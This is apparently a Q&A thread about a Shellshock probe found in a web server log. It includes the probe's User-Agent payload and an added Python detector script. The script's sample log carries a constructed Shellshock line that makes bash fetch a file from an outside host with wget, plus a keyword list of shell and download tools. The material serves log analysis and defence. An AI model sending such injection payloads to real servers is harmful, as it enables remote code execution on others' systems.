egrep "};|}\s*;" /var/www/logs/access* 
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

How can we shut down the server behind the IP that did this?

  • According to the rules, it's not really allowed to ask such questions here, but since you clearly have no idea how to handle this, I answered you anyway; still flagged for closure though – Lighty Sep 26 '14 at 10:24
  • Search for the IP on whois, find out the abuse address, contact those. Most likely the server behind that IP is also a victim. – user10008 Sep 26 '14 at 10:27
  • One of the addresses maps to a .bz (Belize) domain; the other is a Rackspace server. – Mark Sep 26 '14 at 10:30

1 Answer


The log entry you're showing isn't an attack. It's simply a probe to see if you're vulnerable: /bin/ping -c 1 198.101.206.138 means "send a single ICMP echo packet to 198.101.206.138". Further, it only works on systems storing CGI scripts in the non-standard /cgi-sys/ directory, rather than the usual /cgi-bin/.

Mark
  • That leaves us with two options: 1. (bad guy) someone first probing and then attacking, 2. (good guy) someone wanting to find out how many servers are vulnerable. In the case of 2, however, it would be nice to send at least some contact address in the user agent, like [these nice guys](http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html). – user10008 Sep 26 '14 at 10:33
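The answer explains what the log entry is: a Shellshock-style request whose User-Agent carries a bash function definition (`() { :;};`) followed by a payload, where a single ping only tells the sender whether the target executed it. As an added example (not code from the question or the answer), the following Python script scans access-log lines for that pattern and, for each hit, records the source IP, which header carried it, the payload, whether the payload is a bare reachability probe or an attempt to run tools such as wget or bash, any callback IP in the payload, and whether the requested script even existed (a 404, as in the question, means the CGI handler never ran). The first sample line is the one from the question; the remaining lines are constructed, and the probe/exec keyword list and the 404 heuristic are assumptions for the example, not a standard. The match requires the `() {` prefix rather than any `};`, so a stray `{};` in a harmless User-Agent does not trigger it.

```python
import re
from collections import Counter

# Apache/nginx "combined" log format: client IP, identd, user, timestamp,
# request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: an exported bash function body "() { ... }" followed by
# a ";" and the command that a vulnerable bash would execute.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;\s*(?P<payload>.*)$')

# Assumed keyword list for the example: payloads naming a shell or downloader
# are treated as execution attempts, anything else (e.g. a single ping) as a probe.
EXEC_HINT = re.compile(r'\b(wget|curl|bash|sh|nc|perl|python|php)\b')

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')

# Sample input: line 1 is the entry from the question; lines 2-4 are constructed
# (documentation IP ranges) to exercise the exec, benign and false-positive cases.
SAMPLE_LOG = """\
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
203.0.113.7 - - [25/Sep/2014:11:02:13 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://203.0.113.9/x -O /tmp/x'"
198.51.100.4 - - [25/Sep/2014:11:05:44 +0200] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.22 - - [25/Sep/2014:11:06:01 +0200] "GET /style.css HTTP/1.1" 200 340 "-" "curl/7.37.0 {};"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_payload(payload):
    """'exec' if the payload names a shell/downloader, otherwise 'probe'."""
    return "exec" if EXEC_HINT.search(payload) else "probe"


def scan_log(text):
    """Scan log text and return one finding per line carrying a Shellshock payload."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        # The function definition can be injected through any header that the
        # CGI layer exports to the environment; check the ones the log records.
        for field in ("ua", "referer", "req"):
            m = SHELLSHOCK_RE.search(entry[field])
            if m:
                payload = m.group("payload")
                findings.append({
                    "source_ip": entry["ip"],
                    "timestamp": entry["ts"],
                    "field": field,
                    "payload": payload,
                    "kind": classify_payload(payload),
                    "callback_ips": IPV4_RE.findall(payload),
                    # Assumption: a 404 means no CGI script handled the request,
                    # so nothing could have executed (the case in the question).
                    "script_found": entry["status"] != "404",
                })
                break
    return findings


def summarize(findings):
    """Count findings per (source IP, kind) to see who is probing versus attacking."""
    return Counter((f["source_ip"], f["kind"]) for f in findings)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"{f['source_ip']:16} {f['kind']:5} script_found={f['script_found']} "
              f"callback={f['callback_ips']} payload={f['payload']!r}")
    print(summarize(results))
```

Run it against a real file with `scan_log(open("/var/www/logs/access_log").read())`; the `summarize` output groups hits by source and kind, which is the list to take to the abuse contacts mentioned in the comments, while `script_found` separates the 404 probes from requests that actually reached a CGI script and need host-level follow-up.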